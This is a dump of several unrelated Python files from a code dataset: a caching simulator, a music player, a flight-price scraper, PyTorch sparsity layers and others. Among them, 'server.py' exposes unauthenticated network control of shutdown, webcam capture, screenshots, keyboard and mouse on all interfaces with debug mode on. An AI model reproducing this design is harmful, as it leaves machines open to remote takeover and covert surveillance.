miss:\n cost += dst\n else :\n cost += Threshold\n\n \n# if len(self.cache.getAllPoints()) > 313:\n# print(\"iter : \", i, \"Request : \", obj, \" Nearest : \", nearest_obj, \" Mapped : \", mapped_x, mapped_y)\n# self.write_stat_debug(f2, obj, nearest_obj, mapped_x, mapped_y)\n# break\n \n f2 = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/distances.txt', 'w')\n self.write_distance_count(self.obj_catalogue.obj_count_distance, f2)\n f2.write(str(len(self.cache.getAllPoints())))\n f2.close()\n\ns = Simulator(2, 313, 100, 0.4, 100000000, 1, 0.01)\ns.simulate() \n\n\n\n \n\n\n\n 
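# Usage note: the call above maps positionally to Simulator(dim, capacity, no_objects, alpha, iter, update_interval, learning_rate);\n# experiment_type and file_name_extension come from sys.argv, grid_d is fixed at 313 in __init__, and all per-run\n# output files land in the \"<grid_d>_<learning_rate>_<experiment_type>_<file_name_extension>\" directory created there.\n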
\n","sub_path":"similarity-caching/simulator_real_backup.py","file_name":"simulator_real_backup.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216188771","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author: LiPingping\n# Time: 2021/10/14 14:47\n# Desc: Music player copied from: https://www.pythonf.cn/read/123250\n\nimport tkinter\nfrom PIL import Image, ImageTk\nimport pygame\nimport time\nimport os\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import ttk\nimport eyed3\nimport librosa\nimport random\n\n# import 旋律生成 as cmusic\n# import melody_generation as cmusic\n\ntop = tkinter.Tk() # 窗口\ntop.geometry('800x400') # 窗口大小\ntop.title('【书生君陌】音乐播放器') # 窗口名称\n\n\n# loop1=1#循环定义\n# stime=1#时间\n\ndef screen(t): # 透明度设置\n t = int(t)\n top.attributes('-alpha', t / 100) # 设置透明度\n\n\nwidth = top.winfo_screenwidth() # 宽度\nheight = top.winfo_screenheight() - 100 # 高度\n\npygame.init() # 窗口初始化\nfile = tkinter.StringVar() # 获得文件列表\nfiles = tkinter.StringVar() # 获得文件列表\nfilename = tkinter.StringVar()\nfilenames = []\nv = tkinter.StringVar() # 获得文件列表\nv1 = tkinter.StringVar() # 获得文件列表\nvar_mode = tkinter.IntVar() # 播放顺序\nvar_mode2 = tkinter.IntVar() # 播放状态\nvar_mode3 = tkinter.IntVar() # 播放进度\nv2 = tkinter.DoubleVar() # 播放进度\nlongt = 1\n\n\ndef search(): # 搜索文件\n # file_=askopenfilename()\n file_ = askdirectory()\n return file_\n\n\ndef voice(t): # 音量\n t = int(t)\n pygame.mixer.music.set_volume(t / 100) # 设置音量\n\n\ndef showtime(): # 显示时间\n c = time.strftime(\"%H:%M:%S\")\n stime.configure(text=c)\n\n num = pygame.mixer.music.get_pos() / 1000\n print('jindu', num, longt, float(num / longt))\n w3.set(int(num / longt * 100))\n print(w3.get())\n\n top.after(1000, showtime)\n\n\ndef musicplay():\n global filename, filenames\n f = search() # 选择文件夹\n # print(f)\n filename = f\n file.set(f)\n f = os.listdir(f)\n filenames = []\n for fname in f:\n fp = os.path.join(fname)\n filenames.append(fp)\n c2['value'] = filenames\n c2.current(0)\n # lbTime = tkinter.Label(top, anchor='w')\n # lbTime.place(x=25, y=150)\n\n\ndef start():\n # print(filename+c2.get())\n global longt\n var_mode2.set(1)\n print(type(filename), type( c2.get()))\n print(filename + '/' + c2.get())\n pygame.mixer.music.load(filename + '/' + c2.get())\n # longt=int(librosa.get_duration(filename=filename+'/'+c2.get()))\n if c2.get()[-4:] == '.mp3':\n longt = eyed3.load(filename + '/' + c2.get())\n longt = int(longt.info.time_secs)\n else:\n longt = 39\n print(longt)\n print(var_mode.get())\n pygame.mixer.music.play()\n # w3.set(0)\n # pygame.mixer.music.play() # 停止播放\n\n\ndef stop():\n var_mode2.set(0)\n pygame.mixer.music.stop() # 停止播放\n\n\ndef pause():\n var_mode2.set(0)\n pygame.mixer.music.pause() # 暂停\n\n\ndef unpause():\n var_mode2.set(1)\n pygame.mixer.music.unpause() # 继续播放\n\n\ndef picture(): # 保存的路径不能有中文,若需要中文则吧/换成\\\n path_s = askopenfilename()\n files.set(path_s)\n img_open = Image.open(e1.get())\n img = ImageTk.PhotoImage(img_open)\n l1.config(image=img)\n l1.image = img\n\n\n# def create():\n# top = tkinter.Toplevel()\n# top.title('使用提示')\n# top.geometry(\"400x400\")\n# t = \"关于照片,新建一个存放图片的文件,用英文命名,然后存里面的图片也用英文命名。关于音乐: 新建一个名字叫音乐的文件,把歌曲添加到该文件夹。\"\n# msg = tkinter.Message(top, text=t)\n# msg.config(font=('times', 24, 'italic'))\n# msg.place(x=0, y=0)\n\ndef gettime():\n t = time.strftime('%H%M%S')\n s = int(t[0:2])\n d = int(t[2:4])\n f = int(t[4:6])\n g = s * 60 * 
60 + d * 60 + f\n return g\n\n\ndef Listloop():\n global var_mode2\n print(pygame.mixer.music.get_busy(), var_mode.get())\n if var_mode.get() == 1 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n start()\n elif var_mode.get() == 2 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n stop()\n elif var_mode.get() == 3 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = filenames.index(c2.get())\n if num < len(filenames) - 1:\n c2.current(num + 1)\n else:\n c2.current(0)\n print(c2.get())\n start()\n elif var_mode.get() == 4 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = filenames.index(c2.get())\n if num < len(filenames) - 1:\n c2.current(num + 1)\n print(c2.get())\n start()\n else:\n stop()\n elif var_mode.get() == 5 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = random.randint(0, len(filenames))\n c2.current(num)\n print(num, c2.get())\n start()\n # elif var_mode3.get()==0:\n # var_mode3.set(1)\n top.after(3000, Listloop)\n\n\ndef create():\n # cmusic.creatmusic(filename+'/'+e1.get())\n # f=os.listdir(filename)\n # filenames=[]\n # for fname in f:\n # fp=os.path.join(fname)\n # filenames.append(fp)\n # c2['value'] = filenames\n pass\n\n\n# def lenth(v2):\n# global var_mode2,var_mode3\n# var_mode2.set(1)\n# print(v2)\n# var_mode3.set(int(v2) / 100)\n# print(var_mode3.get())\n# pygame.mixer.music.play(0,num*longt)\n# print('hi',pygame.mixer.music.get_busy(),var_mode3.get())\n\n# def jindu():\n# num=pygame.mixer.music.get_pos()\n# print('jindu',num)\n# w3.set(num/longt)\n# print(w3.get())\n# top.after(1000,jindu)\n\nif __name__ == \"__main__\":\n errmsg = 'Error!'\n img_open = Image.open('/home/lee/Pictures/Screenshot from 2021-09-08 11-51-57.png')\n img = ImageTk.PhotoImage(img_open)\n pygame.mixer.music.set_volume(1) # 设置音量\n top.attributes('-alpha', 1) # 设置透明度\n # Listloop()\n var_mode2.set(0)\n # var_mode3.set(1)\n # 选择文件\n tkinter.Button(top, text=\"选择文件夹\", command=musicplay, width=10, bg=\"sky blue\").place(x=20, y=20)\n tkinter.Entry(top, text=file, width=25, state='readonly').place(x=120, y=20)\n\n c2 = ttk.Combobox(top, width=22)\n c2.pack()\n c2.place(x=120, y=90)\n # 选择图片\n tkinter.Button(top, text='选择图片', command=picture, width=10, bg=\"sky blue\").place(x=20, y=55)\n e1 = tkinter.Entry(top, text=files, state='readonly', width=25)\n e1.place(x=120, y=55)\n l1 = tkinter.Label(top) # 图片放置位置\n l1.place(x=320, y=0)\n l1.config(image=img)\n l1.image = img\n # 播放设置\n var_mode.set(1)\n sinloop = tkinter.Radiobutton(top, variable=var_mode, value=1, text=\"单曲循环\")\n sinloop.place(x=20, y=100)\n single = tkinter.Radiobutton(top, variable=var_mode, value=2, text=\"单曲播放\")\n single.place(x=20, y=120)\n allloop = tkinter.Radiobutton(top, variable=var_mode, value=3, text=\"列表循环\")\n allloop.place(x=20, y=140)\n allsin = tkinter.Radiobutton(top, variable=var_mode, value=4, text=\"顺序播放\")\n allsin.place(x=20, y=160)\n ranloop = tkinter.Radiobutton(top, variable=var_mode, value=5, text=\"随机播放\")\n ranloop.place(x=20, y=180)\n # 开始,暂停,继续播放,结束播放\n tkinter.Button(top, text=\"开始播放\", command=start, width=7, bg=\"sky blue\").place(x=100, y=225)\n tkinter.Button(top, text=\"暂停播放\", command=pause, width=7, bg=\"sky blue\").place(x=170, y=245)\n tkinter.Button(top, text=\"继续播放\", command=unpause, width=7, bg=\"sky blue\").place(x=170, y=205)\n tkinter.Button(top, 
text=\"结束播放\", command=stop, width=7, bg=\"sky blue\").place(x=240, y=225)\n # 自己生成旋律\n e2 = tkinter.Entry(top, text='编曲名称', width=25)\n e2.place(x=120, y=130)\n e2.insert(0, '中国风')\n tkinter.Button(top, text=\"随机编曲\", command=create, width=7, bg=\"sky blue\").place(x=170, y=165)\n\n # 音量\n v.set('100')\n w1 = tkinter.Scale(top, from_=0, to=100, orient=\"horizontal\", length=100, variable=v, command=voice, label=\"音量\")\n w1.place(x=20, y=290)\n w1.set(100)\n # 透明度\n v1.set('100')\n w2 = tkinter.Scale(top, from_=30, to=100, orient=\"horizontal\", length=100, variable=v1, command=screen, label=\"透明度\")\n w2.place(x=180, y=290)\n w2.set(100)\n # 播放进度\n v2.set(0.0)\n w3 = tkinter.Scale(top, from_=0, to=100, orient=\"horizontal\", width=10, length=475, variable=v2)\n w3.place(x=320, y=360)\n w3.set(0)\n\n # 时间\n stime = tkinter.Label(top, text=\"\", font=(\"Helvetica\", 15))\n stime.place(x=110, y=350)\n showtime()\n top.mainloop()\n","sub_path":"tests/music_player_demo1.py","file_name":"music_player_demo1.py","file_ext":"py","file_size_in_byte":8876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198448723","text":"#!/usr/bin/env python3\nfrom pyvirtualdisplay import Display\nimport time, requests, random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom writeout import write_out_to_log\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nurl_ip_location = 'http://ipinfo.io/json'\nr = requests.get(url_ip_location).json()\nr = r['city']\n\nwebsite = 'https://www.google.com/flights/#search;f=JFK,EWR,LGA;t=LHR;'\ndates = [\n ['d=2018-03-25;r=2018-03-31', 'f1'],\n ['d=2018-03-18;r=2018-03-31', 'f2'],\n ['d=2018-03-11;r=2018-03-31', 'f3'],\n ['d=2018-03-04;r=2018-03-31', 'f4'],\n ['d=2018-03-25;r=2018-03-31', 'f5'],\n ['d=2018-03-18;r=2018-03-25', 'f6'],\n ['d=2018-03-11;r=2018-03-18', 'f7'],\n ['d=2018-03-04;r=2018-03-11', 'f8']\n ]\npayload = {}\n\ndisplay = Display(visible=0, size=(1920, 1080)).start()\nfirefox_capabilities = DesiredCapabilities.FIREFOX\nfirefox_capabilities['marionette'] = True\nfirefox_capabilities['binary'] = '/usr/bin/firefox'\n\n\ndef init_driver():\n driver = webdriver.Firefox(capabilities=firefox_capabilities)\n driver.wait = WebDriverWait(driver, 5)\n return driver\n\n\ndef lookup(driver):\n\n # loads page\n for date in dates:\n time.sleep(random.uniform(1, 6))\n driver.get(website+date[0])\n\n timeout = 20\n try:\n WebDriverWait(driver, timeout)\n driver.implicitly_wait(10)\n # get text within div class\n element = driver.find_element_by_class_name('LJV2HGB-d-Ab')\n price = (element.get_attribute('innerHTML'))\n # price = price[1:]\n payload[date[1]] = [price, r, date[1]]\n except TimeoutException:\n print(\"Error\")\n driver.quit()\n\nif __name__ == \"__main__\":\n # init driver\n driver = init_driver()\n # tell driver to look up query on google\n lookup(driver)\n write_out_to_log(payload, region=r)\n\n # close driver\n driver.quit()\n","sub_path":"firefox_selenium_script.py","file_name":"firefox_selenium_script.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"582486172","text":"str1_input = input()\nstr2_input = input()\nstr1_valid = str1_input[1:-1]\nstr2_valid = 
str2_input[1:-1]\nnums1 = str1_valid.split(',')\nnums2 = str2_valid.split(',')\nnums1 = [int(x) for x in nums1]\nnums2 = [int(x) for x in nums2]\nnums1 = set(nums1)\nnums2 = set(nums2)\nnums1.intersection_update(nums2)\nnums1 = list(nums1)\nnums1.sort()\nfor i in range(len(nums1)):\n if i == 0:\n print('[' + str(nums1[i]), end = ', ')\n elif i == len(nums1) - 1:\n print(str(nums1[i]) + ']', end = '')\n else:\n print(str(nums1[i]), end = ', ')\n ","sub_path":"Code/CodeRecords/2490/60870/282844.py","file_name":"282844.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"554564504","text":"\n\n#web cakeraeov knkare video\n# heto sra het mek tegh dzaynel kavelacnem\n\ndef is_number(s):\n\ttry: \n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\n\nvideo_finish = False\ndef hello():\n\tglobal video_finish\n\tvideo_finish = True\n\ndef RecordVideoToWebcam(settimeout=60):\n\ttry:\n\t\t# This will return video from the first webcam on your computer. \n\t\tcap = cv2.VideoCapture(0) \n\n\t\t# Define the codec and create VideoWriter object \n\t\tfourcc = cv2.VideoWriter_fourcc(*'XVID') \n\t\tout = cv2.VideoWriter(os.path.join('static/public/webcam', 'video.mp4'), fourcc, 5.0, (640, 480)) \n\n\n\t\tt = threading.Timer(settimeout, hello)\n\t\tt.start()\n\n\t\t# loop runs if capturing has been initialized. \n\t\twhile(True): \n\t\t\t# reads frames from a camera \n\t\t\t# ret checks return at each frame \n\t\t\tret, frame = cap.read() \n\n\n\t\t\tout.write(frame) \n\n\n\t\t\tif video_finish == True:\n\t\t\t\tt.cancel()\n\t\t\t\tbreak\n\n\n\t\t# Close the window / Release webcam \n\t\tcap.release() \n\n\t\t# After we release our webcam, we also release the output \n\t\tout.release() \n\n\t\t# De-allocate any associated memory usage \n\t\tcv2.destroyAllWindows() \n\texcept Exception:\n\t\tpass\n\tfor i in range(30):\n\t\tcap.read()\n\t\n\n# webcakerayov photo e anum\n\ndef PhotoToWebcam():\n\ttry:\n\t\t# Включаем первую камеру\n\t\tcap = cv2.VideoCapture(0)\n\t\t# \"Прогреваем\" камеру, чтобы снимок не был тёмным\n\t\tfor i in range(30):\n\t\t\tcap.read()\n\t\t# Делаем снимок \n\t\tret, frame = cap.read()\n\t\t# Записываем в файл\n\t\tcv2.imwrite(os.path.join('static/public/webcam', 'screen.png'), frame) \n\t\t# Отключаем камеру\n\t\tcap.release()\n\texcept Exception:\n\t\tpass\n\nLastPlaySound = ''\n\ndef SelectFunction(filename):\n\tglobal LastPlaySound\n\tmixer.music.load(os.path.join('public/audio', filename))\n\tmixer.music.play()\n\tLastPlaySound = filename\n\n\n#vercnum e file-i formaty\ndef GetFormat(_str_):\n\tl = ''\n\tfor x in range(len(_str_)-1,-1,-1):\n\t\tif _str_[x] == '.':\n\t\t\tbreak\n\t\tl+=_str_[x]\n\treturn l[::-1].lower()\n\n'''\n# commands\n\nshutdown\nplaysound\nscreenshot-Webcam\nrecord-video-Webcam\n\n'''\n\nimport time\nimport pyautogui\nimport threading\nimport cv2\nfrom pygame import mixer\nmixer.init()\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom flask_socketio import SocketIO, send, emit\n\nimport os\nfrom werkzeug.utils import secure_filename\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nUPLOAD_FOLDER = '/static'\n\n\n\n@socketio.on('sev')\ndef handle_cmd(message):\n\tprint()\n\tprint(message)\n\tprint()\n\t# os.system(\"shutdown /p\")\n\tlist_message = message.split()\n\n\tif not len(list_message) <= 1:\n\t\tif list_message[0] == 'sudo':\n\t\t\tif str(list_message[1]) == 
'shutdown':\t\n\t\t\t\tos.system('shutdown -s')\n\n\t\t\telif list_message[1] == 'playsound':\n\t\t\t\tif (list_message[2] == '-r' or list_message[2] == '-resert') and LastPlaySound != '':\n\t\t\t\t\tget_play_bool = mixer.music.get_busy()\n\t\t\t\t\tif get_play_bool:\n\t\t\t\t\t\tmixer.music.rewind()\n\t\t\t\t\telse:\n\t\t\t\t\t\tmixer.music.load(os.path.join('public/audio', LastPlaySound))\n\t\t\t\t\t\tmixer.music.play()\n\t\t\t\telif list_message[2] == '-setpos':\n\n\t\t\t\t\tprint('sa der petq e kargavorel araj het chi talis')\n\t\t\t\t\t\n\t\t\t\telif list_message[2] == '-v' or list_message[2] == '-value':\n\t\t\t\t\tif is_number(list_message[3]):\n\t\t\t\t\t\tmixer.music.set_volume(float(list_message[3]))\n\t\t\t\t\t\tvolume = float(list_message[3])\n\n\t\t\t\telif list_message[2] == '-p'or list_message[2] == '-pause':\n\t\t\t\t\tmixer.music.pause()\n\t\t\t\telif list_message[2] == '-u' or list_message[2] == '-unpause':\n\t\t\t\t\tmixer.music.unpause()\n\t\t\t\t#estegh petq e ergy egri hamakargichov\n\t\t\telif list_message[1] == 'photo-Webcam':\n\t\t\t\tPhotoToWebcam()\n\n\t\t\telif list_message[1] == 'video-Webcam':\n\t\t\t\tRecordVideoToWebcam()\n\n\t\t\t\t\n\t\t\telif list_message[1] == 'window':\n\t\t\t\tif list_message[2] == 'screenshot':\n\t\t\t\t\tpyautogui.screenshot('static/public/screenshot/foo.png')\n\t\telif list_message[0] == 'keyboard':\n\t\t\t# pyautogui.press(list_message[1],presses=2)\n\t\t\t# pyautogui.press(''.join(list_message)[-1])\n\t\t\tif list_message[1] == 'press':\n\t\t\t\ttext_val = ' '.join(list_message[2:])\n\t\t\t\tif not len(text_val) == 0:\t\n\t\t\t\t\t# pyautogui.write(text_val, interval=0.1)\n\t\t\t\t\t# pyautogui.write(text_val, interval=0.1)\n\n\t\t\t\t\tpyautogui.press(text_val)\n\t\t\telif list_message[1] == 'hotkey':\n\t\t\t\tlist_hotkey = ' '.join(list_message[2:]).split()\n\n\t\t\t\tif len(list_hotkey) <= 5:\n\n\t\t\t\t\tfor x in range(0,5-len(list_hotkey)):\n\t\t\t\t\t\tlist_hotkey.append('')\n\t\t\t\t\tpyautogui.hotkey(list_hotkey[0],list_hotkey[1],list_hotkey[2],list_hotkey[3],list_hotkey[4])\n\n\n\t\telif list_message[0] == 'cursor':\n\n\t\t\tscreenWidth, screenHeight = pyautogui.size() # Get the size of the primary monitor.\n\n\t\t\tcurrentMouseX, currentMouseY = pyautogui.position() # Get the XY position of the mouse.\n\n\t\t\t# pyautogui.write('Hello world!', interval=0.25)\n\t\t\t# print(list_message[1],list_message[2])\n\t\t\t# print(pyautogui.position())\n\t\t\tX,Y = pyautogui.position()\n\n\n\t\t\tX+= int(list_message[1])\n\t\t\tY+= int(list_message[2])\n\t\t\t# # pyautogui.press(list_message[1],presses=2)\n\t\t\t# pyautogui.moveTo(X,Y,duration=0.5)\n\n\n\n\n\n\t\t\tpyautogui.moveTo(X, Y, duration=0.5) # move mouse to XY coordinates over num_second seconds\n\t\t\t# pyautogui.moveRel(xOffset, yOffset, duration=num_seconds) # move mouse relative to its current position\n\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','mp4','mp3'])\n\ndef allowed_file(filename):\n\treturn '.' 
in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n\tif request.method == 'POST':\n\t\tif 'AudioPlayFile' not in request.files:\n\t\t\treturn 'No file selected'\n\t\tfile = request.files['AudioPlayFile']\n\n\t\tif file.filename == '':\n\t\t\treturn \"No file selected\"\n\t\tif file and allowed_file(file.filename):\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\tAudioDir = 'audio'\n\t\t\tFormatName = {\n\t\t\t\t'mp3': AudioDir,\n\t\t\t\t'wav': AudioDir\n\t\t\t}\n\t\t\tif FormatName.get(GetFormat(filename)) != None:\n\t\t\t\t\n\t\t\t\tfile.save(os.path.join('public/audio'.format(AudioDir), filename))\n\t\t\t\n\t\t\t\tSelectFunction(filename)\n\n\treturn redirect(url_for('index'))\n\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True, host='0.0.0.0',port=80)\n# ,port=80\n\n\n\n# # ipconfig\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82667394","text":"import torch\nimport math\nimport torch.nn.functional as F\nfrom torch.nn.modules import Module\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.utils import _pair as pair\nfrom torch.autograd import Variable\nfrom torch.nn import init\n\nlimit_a, limit_b, epsilon = -.1, 1.1, 1e-6\n\nclass MAPDense(Module):\n\n def __init__(self, in_features, out_features, bias=True, weight_decay=0., name='', **kwargs):\n super(MAPDense, self).__init__()\n self.layer_name = name\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(in_features, out_features))\n self.weight_decay = weight_decay\n if bias:\n self.bias = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.reset_parameters()\n print(self)\n\n def reset_parameters(self):\n init.kaiming_normal(self.weight, mode='fan_out')\n\n if self.bias is not None:\n self.bias.data.normal_(0, 1e-2)\n\n def _reg_w(self, **kwargs):\n logpw = - torch.sum(self.weight_decay * .5 * (self.weight.pow(2)))\n logpb = 0\n if self.bias is not None:\n logpb = - torch.sum(self.weight_decay * .5 * (self.bias.pow(2)))\n return logpw + logpb\n\n def regularization(self):\n return self._reg_w()\n\n def forward(self, input):\n output = input.mm(self.weight)\n if self.bias is not None:\n output.add_(self.bias.view(1, self.out_features).expand_as(output))\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ', weight_decay: ' \\\n + str(self.weight_decay) + ')'\n\n\nclass MAPConv2d(Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True,\n name='', **kwargs):\n super(MAPConv2d, self).__init__()\n self.weight_decay = 0\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.padding = pair(padding)\n self.dilation = pair(dilation)\n self.output_padding = pair(0)\n self.groups = groups\n self.weight = Parameter(torch.Tensor(out_channels, in_channels // groups, *self.kernel_size))\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n 
else:\n self.register_parameter('bias', None)\n self.sparse = False\n\n self.input_shape = None\n self.layer_name = name\n self.reset_parameters()\n print(self)\n\n def reset_parameters(self):\n init.kaiming_normal(self.weight, mode='fan_in')\n if self.bias is not None:\n self.bias.data.normal_(0, 1e-2)\n\n def _reg_w(self, **kwargs):\n if self.sparse:\n return 0\n logpw = - torch.sum(self.weight_decay * .5 * (self.weight.pow(2)))\n logpb = 0\n if self.bias is not None:\n logpb = - torch.sum(self.weight_decay * .5 * (self.bias.pow(2)))\n return logpw + logpb\n\n def regularization(self):\n return self._reg_w()\n\n\n def forward(self, input_):\n if self.input_shape is None:\n self.input_shape = input_.size()\n output = F.conv2d(input_, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n return output\n\n def __repr__(self):\n s = ('{name}{layer_name}({in_channels}, {out_channels}, kernel_size={kernel_size} '\n ', stride={stride}, weight_decay={weight_decay}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.output_padding != (0,) * len(self.output_padding):\n s += ', output_padding={output_padding}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n s += ')'\n return s.format(name=self.__class__.__name__, **self.__dict__)\n\n\nclass SparseChannel(Module):\n \"\"\"Implementation of L0 Sparse Channel\"\"\"\n def __init__(self, in_channels, out_channels, lamba=5e-4, temperature=2./3., local_rep=False, name='',\n conv=None, hc=False,**kwargs):\n \"\"\"\n :param out_channels: Number of output channels\n \"\"\"\n super(SparseChannel, self).__init__()\n self.layer_name = name\n self.in_channels = in_channels\n self.ppos = self.out_channels = out_channels\n # self.droprate_init = droprate_init if droprate_init != 0. 
else 0.5\n self.temperature = temperature\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.use_bias = False\n self.dim_z = out_channels\n self.input_shape = None\n self.local_rep = local_rep\n self.prior_prec = 0\n self.lamba = lamba\n self.conv = conv\n self.fine_tune = False\n self.conv.sparse = True\n if hc:\n self.qz_loga = Parameter(torch.Tensor(out_channels))\n self.qz_loga.data.normal_(3.0, 1e-2)\n\n print(self)\n\n def constrain_parameters(self, **kwargs):\n self.qz_loga.data.clamp_(min=math.log(1e-2), max=math.log(1e2))\n\n def cdf_qz(self, x):\n \"\"\"Implements the CDF of the 'stretched' concrete distribution\"\"\"\n xn = (x - limit_a) / (limit_b - limit_a)\n logits = math.log(xn) - math.log(1 - xn)\n return torch.sigmoid(logits * self.temperature - self.qz_loga).clamp(min=epsilon, max=1 - epsilon)\n\n def quantile_concrete(self, x):\n \"\"\"Implements the quantile, aka inverse CDF, of the 'stretched' concrete distribution\"\"\"\n y = torch.sigmoid((torch.log(x) - torch.log(1 - x) + self.qz_loga) / self.temperature)\n return y * (limit_b - limit_a) + limit_a\n\n def _reg_w(self):\n \"\"\"Expected L0 norm under the stochastic gates, takes into account and re-weights also a potential L2 penalty\"\"\"\n q0 = self.cdf_qz(0)\n w = self.conv.kernel_size[0] * self.conv.kernel_size[1]\n logpw_col = torch.sum(- (.5 * self.conv.weight_decay * self.conv.weight.pow(2)) - self.lamba, 3).sum(2).sum(1)\n logpw = torch.sum((1 - q0) * logpw_col) * w\n logpb = 0 if self.conv.bias is None else - torch.sum((1 - q0) * (.5 * self.conv.weight_decay * self.conv.bias.pow(2) -\n self.lamba))\n return logpb + logpw\n\n def regularization(self):\n return self._reg_w()\n\n def get_eps(self, size):\n \"\"\"Uniform random numbers for the concrete distribution\"\"\"\n eps = self.floatTensor(size).uniform_(epsilon, 1-epsilon)\n eps = Variable(eps)\n return eps\n\n def sample_z(self, batch_size, sample=True, qz_loga=None):\n \"\"\"Sample the hard-concrete gates for training and use a deterministic value for testing\"\"\"\n if qz_loga is None:\n qz_loga = self.qz_loga\n if self.fine_tune:\n pi = torch.sigmoid(qz_loga).view(1, self.dim_z, 1, 1)\n return F.hardtanh(pi * (limit_b - limit_a) + limit_a, min_val=0, max_val=1).detach()\n\n if sample:\n eps = self.get_eps(self.floatTensor(batch_size, self.dim_z))\n z = self.quantile_concrete(eps).view(batch_size, self.dim_z, 1, 1)\n return F.hardtanh(z, min_val=0, max_val=1)\n else: # mode\n pi = torch.sigmoid(qz_loga).view(1, self.dim_z, 1, 1)\n return F.hardtanh(pi * (limit_b - limit_a) + limit_a, min_val=0, max_val=1)\n\n def forward(self, input_, qz_loga=None):\n if qz_loga is not None:\n self.qz_loga = qz_loga\n # else:\n # self.loga = math.log(100) * torch.tanh(self.qz_loga)\n if self.input_shape is None:\n self.input_shape = input_.size()\n # if self.local_rep or not self.training:\n z = self.sample_z(input_.size(0), sample=self.training,)\n self.z = z\n return input_.mul(z)\n # else:\n # z = self.quantile_concrete(self.get_eps(self.floatTensor(self.dim_z))).view(self.dim_z, 1, 1, 1)\n # return F.hardtanh(z, min_val=0, max_val=1) * self.weights\n\n def __repr__(self):\n return 'SparseChannel lambda={}'.format(self.lamba)\n\n\nclass MAPBatchNorm2d(torch.nn.BatchNorm2d):\n def __init__(self, sparse_layer, l):\n super(MAPBatchNorm2d, self).__init__(l)\n self.sparse = sparse_layer\n\n def forward(self, input):\n self.input_shape = input.size()\n return torch.nn.BatchNorm2d.forward(self, input)\n\n def 
flops_params(self):\n        # if self.sparse_layer is not None:\n        #     x = torch.zeros(self.input_shape[2:])\n        #     nelements = x.numel() * self.sparse_layer.ppos\n        # else:\n        #     x = torch.zeros(self.input_shape[1:])\n        #     nelements = x.numel()\n\n        x = torch.zeros(self.input_shape[1:])\n        nelements = x.numel()\n\n        total_ops = 2 * nelements\n        return torch.tensor([total_ops, self.weight.numel() + self.bias.numel()])\n\n\nclass AdaptiveAvgPool2d(torch.nn.AdaptiveAvgPool2d):\n    def forward(self, input):\n        self.input = input\n        self.y = torch.nn.AdaptiveAvgPool2d.forward(self, input)\n        return self.y\n\n    def flops_params(self):\n        x = self.input\n        kernel = torch.DoubleTensor([*(x[0].shape[2:])]) // torch.DoubleTensor(list((self.output_size,))).squeeze()\n        total_add = torch.prod(kernel)\n        total_div = 1\n        kernel_ops = total_add + total_div\n        num_elements = self.y[0].numel()\n        total_ops = kernel_ops * num_elements\n        return torch.tensor([total_ops, 0])\n","sub_path":"models/resnet50/l0_layers.py","file_name":"l0_layers.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139648492","text":"import pyautogui\r\nimport time\r\nimport math\r\nfrom multiprocessing import Process, Value\r\n\r\n\r\nbegin_time = time.time() + 3\r\nfly = 0\r\n# ww is written by one process and read by another; a 